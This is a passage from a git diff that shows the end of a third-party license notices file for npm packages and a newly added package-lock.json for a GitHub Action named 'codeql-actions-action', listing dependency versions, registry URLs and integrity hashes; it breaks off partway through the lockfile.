PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/http-client +MIT +Actions Http Client for Node.js + +Copyright (c) GitHub, Inc. + +All rights reserved. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and +associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, +and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT +LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN +NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + +@actions/io +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/tool-cache +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@fastify/busboy +MIT +Copyright Brian White. All rights reserved. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to +deal in the Software without restriction, including without limitation the +rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +sell copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +IN THE SOFTWARE. + +semver +ISC +The ISC License + +Copyright (c) Isaac Z. Schlueter and Contributors + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR +IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + + +tunnel +MIT +The MIT License (MIT) + +Copyright (c) 2012 Koichi Kobayashi + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. + + +undici +MIT +MIT License + +Copyright (c) Matteo Collina and Undici contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + +uuid +MIT +The MIT License (MIT) + +Copyright (c) 2010-2020 Robert Kieffer and other contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json new file mode 100644 index 00000000000..eef94f4b5cd --- /dev/null +++ b/.github/action/package-lock.json @@ -0,0 +1,639 @@ +{ + "name": "codeql-actions-action", + "version": "0.1.0", + "lockfileVersion": 2, + "requires": true, + "packages": { + "": { + "name": "codeql-actions-action", + "version": "0.1.0", + "license": "MIT", + "dependencies": { + "@actions/core": "^1.10.1", + "@actions/exec": "^1.1.1", + "@actions/github": "^5.1.1", + "@actions/tool-cache": "^2.0.1" + }, + "devDependencies": { + "@types/node": "^20.6.0", + "@vercel/ncc": "^0.38.0", + "prettier": "^3.0.3", + "typescript": "^5.2.2" + } + }, + "node_modules/@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "node_modules/@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "dependencies": { + "@actions/io": "^1.0.1" + } + }, + "node_modules/@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "dependencies": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "node_modules/@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "dependencies": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "node_modules/@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "node_modules/@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "dependencies": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + } + }, + "node_modules/@actions/tool-cache/node_modules/uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", + "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", + "bin": { + "uuid": "bin/uuid" + } + }, + "node_modules/@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "dependencies": { + "@octokit/types": "^6.0.3" + } + }, + "node_modules/@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "dependencies": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "dependencies": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", + "dependencies": { + "@octokit/request": "^5.6.0", + "@octokit/types": "^6.0.3", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/openapi-types": { + "version": "12.11.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", + "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" + }, + "node_modules/@octokit/plugin-paginate-rest": { + "version": "2.21.3", + "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", + "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", + "dependencies": { + "@octokit/types": "^6.40.0" + }, + "peerDependencies": { + "@octokit/core": ">=2" + } + }, + "node_modules/@octokit/plugin-rest-endpoint-methods": { + "version": "5.16.2", + "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", + "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", + "dependencies": { + "@octokit/types": "^6.39.0", + "deprecation": "^2.3.1" + }, + "peerDependencies": { + "@octokit/core": ">=3" + } + }, + "node_modules/@octokit/request": { + "version": "5.6.3", + "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", + "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "dependencies": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "node_modules/@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "dependencies": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "node_modules/@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "dependencies": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "node_modules/@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "dependencies": { + "undici-types": "~5.26.4" + } + }, + "node_modules/@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true, + "bin": { + "ncc": "dist/ncc/cli.js" + } + }, + "node_modules/before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "node_modules/deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dependencies": { + "whatwg-url": "^5.0.0" + }, + "engines": { + "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "node_modules/tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==", + "engines": { + "node": ">=0.6.11 <=0.7.0 || >=0.7.3" + } + }, + "node_modules/typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "dependencies": { + "@fastify/busboy": "^2.0.0" + }, + "engines": { + "node": ">=14.0" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "node_modules/universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + }, + "dependencies": { + "@actions/core": { + "version": "1.10.1", + "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", + "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", + "requires": { + "@actions/http-client": "^2.0.1", + "uuid": "^8.3.2" + } + }, + "@actions/exec": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", + "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", + "requires": { + "@actions/io": "^1.0.1" + } + }, + "@actions/github": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", + "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", + "requires": { + "@actions/http-client": "^2.0.1", + "@octokit/core": "^3.6.0", + "@octokit/plugin-paginate-rest": "^2.17.0", + "@octokit/plugin-rest-endpoint-methods": "^5.13.0" + } + }, + "@actions/http-client": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", + "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", + "requires": { + "tunnel": "^0.0.6", + "undici": "^5.25.4" + } + }, + "@actions/io": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", + "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" + }, + "@actions/tool-cache": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", + "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", + "requires": { + "@actions/core": "^1.2.6", + "@actions/exec": "^1.0.0", + "@actions/http-client": "^2.0.1", + "@actions/io": "^1.1.1", + "semver": "^6.1.0", + "uuid": "^3.3.2" + }, + "dependencies": { + "uuid": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", + "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" + } + } + }, + "@fastify/busboy": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", + "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==" + }, + "@octokit/auth-token": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", + "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", + "requires": { + "@octokit/types": "^6.0.3" + } + }, + "@octokit/core": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", + "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", + "requires": { + "@octokit/auth-token": "^2.4.4", + "@octokit/graphql": "^4.5.8", + "@octokit/request": "^5.6.3", + "@octokit/request-error": "^2.0.5", + "@octokit/types": "^6.0.3", + "before-after-hook": "^2.2.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/endpoint": { + "version": "6.0.12", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", + "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", + "requires": { + "@octokit/types": "^6.0.3", + "is-plain-object": "^5.0.0", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/graphql": { + "version": "4.8.0", + "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", + "integrity": 